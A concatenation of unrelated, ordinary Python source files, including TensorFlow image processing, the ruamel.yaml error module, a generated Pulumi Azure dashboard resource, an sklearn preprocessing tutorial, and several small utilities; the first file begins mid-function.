blue = tf.image.flip_up_down(tf.image.flip_left_right(blue))
blue = tf.image.resize_bilinear(blue, shape)
blue = tf.image.flip_up_down(tf.image.flip_left_right(blue))
rgb_images = tf.concat([red, green, blue], axis=-1)
return rgb_images
def apply_ccms(images, ccms):
"""Applies color correction matrices."""
images.shape.assert_has_rank(4)
images = images[:, :, :, tf.newaxis, :]
ccms = ccms[:, tf.newaxis, tf.newaxis, :, :]
return tf.reduce_sum(images * ccms, axis=-1)
def gamma_compression(images, gamma=2.2):
"""Converts from linear to gamma space."""
# Clamps to prevent numerical instability of gradients near zero.
return tf.maximum(images, 1e-8) ** (1.0 / gamma)
def process(bayer_images, red_gains, blue_gains, cam2rgbs):
"""Processes a batch of Bayer RGGB images into sRGB images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
with tf.name_scope(None, 'process'):
# White balance.
bayer_images = apply_gains(bayer_images, red_gains, blue_gains)
# Demosaic.
bayer_images = tf.clip_by_value(bayer_images, 0.0, 1.0)
images = demosaic(bayer_images)
# Color correction.
images = apply_ccms(images, cam2rgbs)
# Gamma compression.
images = tf.clip_by_value(images, 0.0, 1.0)
images = gamma_compression(images)
return images
|
from uuid import UUID
import dao.user_dao as dao
from api import db
from utils.common import PlutoException
class InvalidUserException(PlutoException):
pass
def create_user(username: str, user_attributes):
uuid = UUID(user_attributes.get('sub', None))
existing_user = dao.find_user(uuid)
if existing_user is not None:
return existing_user
email = user_attributes.get('email', None)
name = user_attributes.get('name', None)
if username and email:
user = dao.create_user(uuid, username, email, name)
db.session.commit()
return user
raise InvalidUserException("Username or email not defined")
|
"""Creates New Test Command."""
from ..commands import BaseScaffoldCommand
class TestCommand(BaseScaffoldCommand):
"""
Creates a new test case.
test
{name : Name of the test you would like to create}
"""
scaffold_name = "Test"
postfix = ""
prefix = "Test"
template = "/masonite/snippets/scaffold/test"
base_directory = "tests/test_"
file_to_lower = True
|
import sqlite3
from .db import DB
class CounsellingInfoTable(DB):
def __init__(self):
self.table_name = 'WB_counselling'
self.table_desc = 'West Bengal ambulance and tele-counselling information'
self.cols = self.getcolumns()
def getcolumns(self):
cols = {
'date': 'DATE NOT NULL PRIMARY KEY',
'general_queries_24h': 'INT',
'general_queries_cum': 'INT',
'consultations_24h': 'INT',
'consultations_total': 'INT',
'ambulances_assigned_24h': 'INT',
'ambulance_calls_24h': 'INT',
'telepsych_counselling_24h': 'INT',
'telepsych_counselling_total': 'INT'
}
return cols
|
# Data Preprocessing Tools for Data Cleaning
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_ ('')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Taking care of missing data
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
print(X)
# Encoding categorical data
# Encoding the Independent Variable
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
X = np.array(ct.fit_transform(X))
print(X)
# Encoding the Dependent Variable
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
y = le.fit_transform(y)
print(y)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)
print(X_train)
print(X_test)
print(y_train)
print(y_test)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train[:, 3:] = sc.fit_transform(X_train[:, 3:])
X_test[:, 3:] = sc.transform(X_test[:, 3:])
print(X_train)
print(X_test)
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup()
d['packages'] = ['resource_retriever']
d['scripts'] = []
d['package_dir'] = {'': 'src'}
setup(**d)
|
# coding: utf-8
from __future__ import absolute_import
import warnings
import textwrap
from ruamel.yaml.compat import utf8
if False: # MYPY
from typing import Any, Dict, Optional, List, Text # NOQA
__all__ = [
'FileMark', 'StringMark', 'CommentMark', 'YAMLError', 'MarkedYAMLError',
'ReusedAnchorWarning', 'UnsafeLoaderWarning', 'MarkedYAMLWarning',
'MarkedYAMLFutureWarning',
]
class StreamMark(object):
__slots__ = 'name', 'index', 'line', 'column',
def __init__(self, name, index, line, column):
# type: (Any, int, int, int) -> None
self.name = name
self.index = index
self.line = line
self.column = column
def __str__(self):
# type: () -> Any
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line + 1, self.column + 1)
return where
class FileMark(StreamMark):
__slots__ = ()
class StringMark(StreamMark):
__slots__ = 'name', 'index', 'line', 'column', 'buffer', 'pointer',
def __init__(self, name, index, line, column, buffer, pointer):
# type: (Any, int, int, int, Any, Any) -> None
StreamMark.__init__(self, name, index, line, column)
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
# type: (int, int) -> Any
if self.buffer is None: # always False
return None
head = ''
start = self.pointer
while (start > 0 and
self.buffer[start - 1] not in u'\0\r\n\x85\u2028\u2029'):
start -= 1
if self.pointer - start > max_length / 2 - 1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while (end < len(self.buffer) and
self.buffer[end] not in u'\0\r\n\x85\u2028\u2029'):
end += 1
if end - self.pointer > max_length / 2 - 1:
tail = ' ... '
end -= 5
break
snippet = utf8(self.buffer[start:end])
caret = '^'
caret = '^ (line: {})'.format(self.line + 1)
return ' ' * indent + head + snippet + tail + '\n' \
+ ' ' * (indent + self.pointer - start + len(head)) + caret
def __str__(self):
# type: () -> Any
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line + 1, self.column + 1)
if snippet is not None:
where += ":\n" + snippet
return where
class CommentMark(object):
__slots__ = 'column',
def __init__(self, column):
# type: (Any) -> None
self.column = column
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
# warn is ignored
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
return '\n'.join(lines)
class YAMLStreamError(Exception):
pass
class YAMLWarning(Warning):
pass
class MarkedYAMLWarning(YAMLWarning):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
self.warn = warn
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
if self.warn is not None and self.warn:
warn = textwrap.dedent(self.warn) # type: ignore
lines.append(warn)
return '\n'.join(lines)
class ReusedAnchorWarning(YAMLWarning):
pass
class UnsafeLoaderWarning(YAMLWarning):
text = """
The default 'Loader' for 'load(stream)' without further arguments can be unsafe.
Use 'load(stream, Loader=ruamel.yaml.Loader)' explicitly if that is OK.
Alternatively include the following in your code:
import warnings
warnings.simplefilter('ignore', ruamel.yaml.error.UnsafeLoaderWarning)
In most other cases you should consider using 'safe_load(stream)'"""
pass
warnings.simplefilter('once', UnsafeLoaderWarning)
class MantissaNoDotYAML1_1Warning(YAMLWarning):
def __init__(self, node, flt_str):
# type: (Any, Any) -> None
self.node = node
self.flt = flt_str
def __str__(self):
# type: () -> Any
line = self.node.start_mark.line
col = self.node.start_mark.column
return """
In YAML 1.1 floating point values should have a dot ('.') in their mantissa.
See the Floating-Point Language-Independent Type for YAML™ Version 1.1 specification
( http://yaml.org/type/float.html ). This dot is not required for JSON nor for YAML 1.2
Correct your float: "{}" on line: {}, column: {}
or alternatively include the following in your code:
import warnings
warnings.simplefilter('ignore', ruamel.yaml.error.MantissaNoDotYAML1_1Warning)
""".format(self.flt, line, col)
warnings.simplefilter('once', MantissaNoDotYAML1_1Warning)
class YAMLFutureWarning(Warning):
pass
class MarkedYAMLFutureWarning(YAMLFutureWarning):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
self.warn = warn
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
if self.warn is not None and self.warn:
warn = textwrap.dedent(self.warn) # type: ignore
lines.append(warn)
return '\n'.join(lines)
|
from tezos_private_node_connectivity_checker import application
if __name__ == "__main__":
application.run()
|
import re
import mistune
from fluffy.app import app
from fluffy.component.highlighting import guess_lexer
from fluffy.component.highlighting import PygmentsHighlighter
class HtmlCommentsInlineLexerMixin:
"""Strip HTML comments inside lines."""
def enable_html_comments(self):
self.rules.html_comment = re.compile(
'^<!--(.*?)-->',
)
self.default_rules.insert(0, 'html_comment')
def output_html_comment(self, m):
return ''
class HtmlCommentsBlockLexerMixin:
"""Strip blocks which consist entirely of HTML comments."""
def enable_html_comments(self):
self.rules.html_comment = re.compile(
'^<!--(.*?)-->',
)
self.default_rules.insert(0, 'html_comment')
def parse_html_comment(self, m):
pass
class CodeRendererMixin:
"""Render highlighted code."""
def block_code(self, code, lang):
return PygmentsHighlighter(
guess_lexer(code, lang, None, opts={'stripnl': True}),
).highlight(code)
class FluffyMarkdownRenderer(
CodeRendererMixin,
mistune.Renderer,
):
pass
class FluffyMarkdownInlineLexer(
mistune.InlineLexer,
HtmlCommentsInlineLexerMixin,
):
pass
class FluffyMarkdownBlockLexer(
mistune.BlockLexer,
HtmlCommentsBlockLexerMixin,
):
pass
_renderer = FluffyMarkdownRenderer(
escape=True,
hard_wrap=False,
)
_inline = FluffyMarkdownInlineLexer(_renderer)
_inline.enable_html_comments()
_block = FluffyMarkdownBlockLexer(mistune.BlockGrammar())
_block.enable_html_comments()
@app.template_filter()
def markdown(text):
return mistune.Markdown(
renderer=_renderer,
inline=_inline,
block=_block,
)(text)
|
"""
Comma Separated Values - CSV (Valores separados por vírgula)
É um formato de dados muito usado em tabelas (Excel, Google Sheets), bases de
dados, clientes de e-mail, etc...
"""
import csv
with open('clientes.csv', 'r') as arquivo:
dados = [x for x in csv.DictReader(arquivo)]
with open('cliente2.csv', 'w') as arquivo:
escreve = csv.writer(
arquivo,
delimiter=',',
quotechar='"',#deli,itar o fim com aspas
quoting=csv.QUOTE_ALL#aspas em todos dados
)
chaves = dados[0].keys()
chaves = list(chaves)
escreve.writerow(
[
chaves[0],
chaves[1],
chaves[2],
chaves[3]
]
)
for dado in dados:
escreve.writerow(#escreve a linha
[
dado['Nome'],
dado['Sobrenome'],
dado['E-mail'],
dado['Telefone']
]
)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DashboardArgs', 'Dashboard']
@pulumi.input_type
class DashboardArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Dashboard resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dashboard_properties is not None:
pulumi.set(__self__, "dashboard_properties", dashboard_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> Optional[pulumi.Input[str]]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@dashboard_properties.setter
def dashboard_properties(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dashboard_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _DashboardState:
def __init__(__self__, *,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Dashboard resources.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if dashboard_properties is not None:
pulumi.set(__self__, "dashboard_properties", dashboard_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> Optional[pulumi.Input[str]]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@dashboard_properties.setter
def dashboard_properties(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dashboard_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Dashboard(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a shared dashboard in the Azure Portal.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
config = pulumi.Config()
md_content = config.get("mdContent")
if md_content is None:
md_content = "# Hello all :)"
video_link = config.get("videoLink")
if video_link is None:
video_link = "https://www.youtube.com/watch?v=......"
current = azure.core.get_subscription()
my_group = azure.core.ResourceGroup("my-group", location="West Europe")
my_board = azure.dashboard.Dashboard("my-board",
resource_group_name=my_group.name,
location=my_group.location,
tags={
"source": "managed",
},
dashboard_properties=f\"\"\"{{
"lenses": {{
"0": {{
"order": 0,
"parts": {{
"0": {{
"position": {{
"x": 0,
"y": 0,
"rowSpan": 2,
"colSpan": 3
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/MarkdownPart",
"settings": {{
"content": {{
"settings": {{
"content": "{md_content}",
"subtitle": "",
"title": ""
}}
}}
}}
}}
}},
"1": {{
"position": {{
"x": 5,
"y": 0,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/VideoPart",
"settings": {{
"content": {{
"settings": {{
"title": "Important Information",
"subtitle": "",
"src": "{video_link}",
"autoplay": true
}}
}}
}}
}}
}},
"2": {{
"position": {{
"x": 0,
"y": 4,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [
{{
"name": "ComponentId",
"value": "/subscriptions/{current.subscription_id}/resourceGroups/myRG/providers/microsoft.insights/components/myWebApp"
}}
],
"type": "Extension/AppInsightsExtension/PartType/AppMapGalPt",
"settings": {{}},
"asset": {{
"idInputName": "ComponentId",
"type": "ApplicationInsights"
}}
}}
}}
}}
}}
}},
"metadata": {{
"model": {{
"timeRange": {{
"value": {{
"relative": {{
"duration": 24,
"timeUnit": 1
}}
}},
"type": "MsPortalFx.Composition.Configuration.ValueTypes.TimeRange"
}},
"filterLocale": {{
"value": "en-us"
}},
"filters": {{
"value": {{
"MsPortalFx_TimeRange": {{
"model": {{
"format": "utc",
"granularity": "auto",
"relative": "24h"
}},
"displayCache": {{
"name": "UTC Time",
"value": "Past 24 hours"
}},
"filteredPartIds": [
"StartboardPart-UnboundPart-ae44fef5-76b8-46b0-86f0-2b3f47bad1c7"
]
}}
}}
}}
}}
}}
}}
\"\"\")
```
It is recommended to follow the steps outlined
[here](https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-dashboards-create-programmatically#fetch-the-json-representation-of-the-dashboard) to create a Dashboard in the Portal and extract the relevant JSON to use in this resource. From the extracted JSON, the contents of the `properties: {}` object can used. Variables can be injected as needed - see above example.
## Import
Dashboards can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:dashboard/dashboard:Dashboard my-board /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Portal/dashboards/00000000-0000-0000-0000-000000000000
```
Note the URI in the above sample can be found using the Resource Explorer tool in the Azure Portal.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DashboardArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a shared dashboard in the Azure Portal.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
config = pulumi.Config()
md_content = config.get("mdContent")
if md_content is None:
md_content = "# Hello all :)"
video_link = config.get("videoLink")
if video_link is None:
video_link = "https://www.youtube.com/watch?v=......"
current = azure.core.get_subscription()
my_group = azure.core.ResourceGroup("my-group", location="West Europe")
my_board = azure.dashboard.Dashboard("my-board",
resource_group_name=my_group.name,
location=my_group.location,
tags={
"source": "managed",
},
dashboard_properties=f\"\"\"{{
"lenses": {{
"0": {{
"order": 0,
"parts": {{
"0": {{
"position": {{
"x": 0,
"y": 0,
"rowSpan": 2,
"colSpan": 3
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/MarkdownPart",
"settings": {{
"content": {{
"settings": {{
"content": "{md_content}",
"subtitle": "",
"title": ""
}}
}}
}}
}}
}},
"1": {{
"position": {{
"x": 5,
"y": 0,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/VideoPart",
"settings": {{
"content": {{
"settings": {{
"title": "Important Information",
"subtitle": "",
"src": "{video_link}",
"autoplay": true
}}
}}
}}
}}
}},
"2": {{
"position": {{
"x": 0,
"y": 4,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [
{{
"name": "ComponentId",
"value": "/subscriptions/{current.subscription_id}/resourceGroups/myRG/providers/microsoft.insights/components/myWebApp"
}}
],
"type": "Extension/AppInsightsExtension/PartType/AppMapGalPt",
"settings": {{}},
"asset": {{
"idInputName": "ComponentId",
"type": "ApplicationInsights"
}}
}}
}}
}}
}}
}},
"metadata": {{
"model": {{
"timeRange": {{
"value": {{
"relative": {{
"duration": 24,
"timeUnit": 1
}}
}},
"type": "MsPortalFx.Composition.Configuration.ValueTypes.TimeRange"
}},
"filterLocale": {{
"value": "en-us"
}},
"filters": {{
"value": {{
"MsPortalFx_TimeRange": {{
"model": {{
"format": "utc",
"granularity": "auto",
"relative": "24h"
}},
"displayCache": {{
"name": "UTC Time",
"value": "Past 24 hours"
}},
"filteredPartIds": [
"StartboardPart-UnboundPart-ae44fef5-76b8-46b0-86f0-2b3f47bad1c7"
]
}}
}}
}}
}}
}}
}}
\"\"\")
```
It is recommended to follow the steps outlined
[here](https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-dashboards-create-programmatically#fetch-the-json-representation-of-the-dashboard) to create a Dashboard in the Portal and extract the relevant JSON to use in this resource. From the extracted JSON, the contents of the `properties: {}` object can used. Variables can be injected as needed - see above example.
## Import
Dashboards can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:dashboard/dashboard:Dashboard my-board /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Portal/dashboards/00000000-0000-0000-0000-000000000000
```
Note the URI in the above sample can be found using the Resource Explorer tool in the Azure Portal.
:param str resource_name: The name of the resource.
:param DashboardArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DashboardArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DashboardArgs.__new__(DashboardArgs)
__props__.__dict__["dashboard_properties"] = dashboard_properties
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
super(Dashboard, __self__).__init__(
'azure:dashboard/dashboard:Dashboard',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Dashboard':
"""
Get an existing Dashboard resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DashboardState.__new__(_DashboardState)
__props__.__dict__["dashboard_properties"] = dashboard_properties
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
return Dashboard(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> pulumi.Output[str]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Shared Dashboard. This should be be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
|
#!/usr/bin/env python3
from .input import myinput
from .utils import loop, mywrapper
from .widgets import Border, CMDInput, Text, VList
__all__ = [
'loop',
'myinput',
'mywrapper',
# widgets
'Border',
'CMDInput',
'Text',
'VList',
]
name = 'mytui'
|
'''Character counting as a fold'''
from functools import reduce
from itertools import repeat
from os.path import expanduser
# charCounts :: String -> Dict Char Int
def charCounts(s):
'''A dictionary of
(character, frequency) mappings
'''
def tally(dct, c):
dct[c] = 1 + dct[c] if c in dct else 1
return dct
return reduce(tally, list(s), {})
# TEST ----------------------------------------------------
# main :: IO ()
def main():
'''Listing in descending order of frequency.'''
print((
tabulated(
'Descending order of frequency:\n'
)(compose(repr)(fst))(compose(str)(snd))(
5
)(stet)(
sorted(
list(charCounts(
readFile('~/Code/charCount/readme.txt')
).items()),
key=swap,
reverse=True
)
)
))
# GENERIC -------------------------------------------------
